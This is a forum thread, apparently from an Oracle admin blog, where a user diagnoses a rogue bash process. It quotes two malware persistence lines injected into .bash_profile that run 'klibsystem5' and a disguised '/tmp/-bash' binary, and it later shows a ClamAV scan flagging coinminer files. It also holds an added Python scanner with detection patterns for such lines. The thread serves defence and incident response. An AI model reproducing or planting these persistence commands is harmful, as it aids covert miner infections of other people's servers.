Administrator
Check /var/log/messages and dmesg outputs as well. Any errors there?
This bash process runs from the "/" directory. What do you have there? Any scripts? Send me the ls -al output from the "/" directory.
Administrator
You can also enable debug for all the bash processes in the system. But this is a little risky, and you have to know what you are doing.
In reply to this post by ErmanArslansOracleBlog

[appsdev@test ~]$ cat /etc/redhat-release
Red Hat Enterprise Linux Server release 7.9 (Maipo)

I can see there is an entry made in .bash_profile automatically. Please see below:

cp -f -r -- /bin/klibsystem5 2>/dev/null && /bin/klibsystem5 >/dev/null 2>&1 && rm -rf -- /bin/klibsystem5 2>/dev/null
cp -f -r -- /tmp/.pwn/bprofr /tmp/-bash 2>/dev/null && /tmp/-bash -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- /tmp/-bash 2>/dev/null
[root@test log]# cd /
[root@test /]# ls -la
total 80
dr-xr-xr-x. 20 root root 4096 Mar 23 12:35 .
dr-xr-xr-x. 20 root root 4096 Mar 23 12:35 ..
lrwxrwxrwx. 1 root root 7 Sep 13 2023 bin -> usr/bin
dr-xr-xr-x. 5 root root 4096 Apr 18 15:42 boot
drwxr-xr-x. 7 root root 4096 May 1 14:40 data
drwxr-xr-x. 21 root root 3680 Mar 23 12:35 dev
drwxr-xr-x. 187 root root 12288 May 9 12:21 etc
drwxr-xr-x. 7 root root 78 Apr 25 11:51 home
lrwxrwxrwx. 1 root root 7 Sep 13 2023 lib -> usr/lib
lrwxrwxrwx. 1 root root 9 Sep 13 2023 lib64 -> usr/lib64
drwxr-xr-x. 2 root root 6 Apr 11 2018 media
drwxr-xr-x. 7 root root 78 Sep 14 2023 mnt
drwxrwxrwx. 6 1005 dba 102 Apr 24 05:56 opt
dr-xr-xr-x. 642 root root 0 Mar 23 18:04 proc
-rw-r--r--. 1 root root 14475 Mar 23 12:35 .readahead
dr-xr-x---+ 24 root root 4096 Apr 24 18:11 root
drwxr-xr-x. 58 root root 1600 May 10 07:21 run
lrwxrwxrwx. 1 root root 8 Sep 13 2023 sbin -> usr/sbin
drwxr-xr-x. 2 root root 6 Apr 11 2018 srv
dr-xr-xr-x. 13 root root 0 Mar 23 12:34 sys
drwxr-xr-x. 2 root root 6 Sep 13 2023 TEST
drwxrwxrwt. 21 root root 8192 May 10 10:23 tmp
drwxr-xr-x. 11 root root 4096 May 1 13:06 u01
drwxr-xr-x. 14 root root 4096 Jan 19 17:15 usr
drwxr-xr-x. 24 root root 4096 Apr 30 11:55 var
[root@test /]#
Administrator
Okay.. Well...

---
cp -f -r -- /bin/klibsystem5 2>/dev/null && /bin/klibsystem5 >/dev/null 2>&1 && rm -rf -- /bin/klibsystem5 2>/dev/null
cp -f -r -- /tmp/.pwn/bprofr /tmp/-bash 2>/dev/null && /tmp/-bash -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- /tmp/-bash 2>/dev/null
----

The first command copies a system file (klibsystem5), potentially executes it (with unknown effects), hides any errors, and then deletes the original file. This is highly likely to damage your system.

The second command copies a potentially malicious program (.pwn/bprofr) from the temporary directory, renames it to a hidden file (-bash) that looks like the standard bash shell program, tries to run it with port forwarding options, hides any output, and then deletes the copied program. This executes a bash!! -- THIS MAY BE THE CAUSE!

So these may cause the problem. Speak with your OS admin about these. Comment them out if it is okay (they seem like malware), kill that problematic bash, and see whether or not this fixes your issue.
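A small triage script for the kind of injected startup-file lines discussed in this thread. It is an added example written for this page, not code from the forum or from any of the posters; it assumes you run it on copies of ~/.bash_profile, ~/.bashrc, /etc/profile.d/* or a crontab dump, and the benign lines around the two quoted commands in the sample are constructed.

```python
import re
import sys
from pathlib import Path

# Constructed sample: the two lines the poster found in ~/.bash_profile,
# surrounded by ordinary (constructed) profile lines, so the checks can be
# exercised offline without touching a real system.
SAMPLE_PROFILE = """\
# .bash_profile
if [ -f ~/.bashrc ]; then . ~/.bashrc; fi
PATH=$PATH:$HOME/.local/bin:$HOME/bin
cp -f -r -- /bin/klibsystem5 2>/dev/null && /bin/klibsystem5 >/dev/null 2>&1 && rm -rf -- /bin/klibsystem5 2>/dev/null
cp -f -r -- /tmp/.pwn/bprofr /tmp/-bash 2>/dev/null && /tmp/-bash -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- /tmp/-bash 2>/dev/null
export PATH
"""

# Each check is (reason, regex). The strong ones are reported on their own;
# the weak one only alongside a strong hit, because many legitimate profile
# lines silence their output too.
STRONG_CHECKS = [
    ("executes a file from /tmp, /var/tmp or /dev/shm",
     re.compile(r"(?:^|[\s;&|])/(?:tmp|var/tmp|dev/shm)/\S+")),
    ("hidden directory under a world-writable path",
     re.compile(r"/(?:tmp|var/tmp|dev/shm)/\.[^/\s]+/")),
    ("file name starting with '-' (masquerades as a shell or an option)",
     re.compile(r"/-[A-Za-z0-9_]+\b")),
    ("copies a binary, runs it, then deletes it",
     re.compile(r"\bcp\b.*&&.*\brm\s+-rf\b")),
]
WEAK_CHECK = ("discards all output", re.compile(r">\s*/dev/null\s+2>&1"))


def scan_startup_text(text):
    """Return {line_number: [reasons]} for lines that look like injected persistence."""
    findings = {}
    for n, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        reasons = [why for why, rx in STRONG_CHECKS if rx.search(line)]
        if reasons and WEAK_CHECK[1].search(line):
            reasons.append(WEAK_CHECK[0])
        if reasons:
            findings[n] = reasons
    return findings


def scan_files(paths):
    """Scan real files (startup scripts, profile.d snippets, crontab dumps) by path."""
    return {str(p): scan_startup_text(Path(p).read_text(errors="replace"))
            for p in paths if Path(p).is_file()}


if __name__ == "__main__":
    targets = sys.argv[1:]
    results = scan_files(targets) if targets else {"<sample>": scan_startup_text(SAMPLE_PROFILE)}
    for path, hits in results.items():
        for n, reasons in sorted(hits.items()):
            print(f"{path}:{n}: " + "; ".join(reasons))
```

Run with no arguments to see it flag the two sample lines; pass file paths to scan the real thing (hits are leads for your OS and security admins to review, not a verdict).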
Administrator
By the way, I now checked, and I can tell that these are malware. You have malware in your system (klibsystem5 & bprofr).
Get rid of them as soon as possible!
How can I remove this malware? Please suggest.
Actually, we are using a custom application (Oracle Forms and Reports). I am facing this issue on every machine on which the application is running. I have commented out both commands in .bash_profile, but I think I have done this many times before. The entry is made automatically. Before this, there was the same entry in crontab; thus, I've disabled the cron jobs for appsdev, which owns the application files.
Administrator
You must remove it.
Either you remove it yourself manually (by discovering its source files and deleting all of them one by one), or you remove it using a Linux virus scanner ("clamav" is an example of such a tool, and it is easy to use) -- https://oracle-base.com/articles/linux/linux-antivirus-clamav
But you should be very careful not to delete any of the system files or EBS-related files. Migrating your affected applications / databases to a new server is also an option, and it might be a better option in case you can't be sure about the removal of the whole of that malware. But if you migrate, there is a risk that you migrate the malware too. So careful and delicate work is required (for all the options).
Output is like this. Should I remove these files? I think these files have no use on the system.
[root@test bin]# clamscan -i -v -r / | grep FOUND
[... several dozen files under /u01/appsxe/jdk8, each reported as Multios.Coinminer.Miner-6781728-2 FOUND; list omitted ...]
[root@test bin]#
Administrator
There are findings, as you see. Work with your security and OS administrators after this point.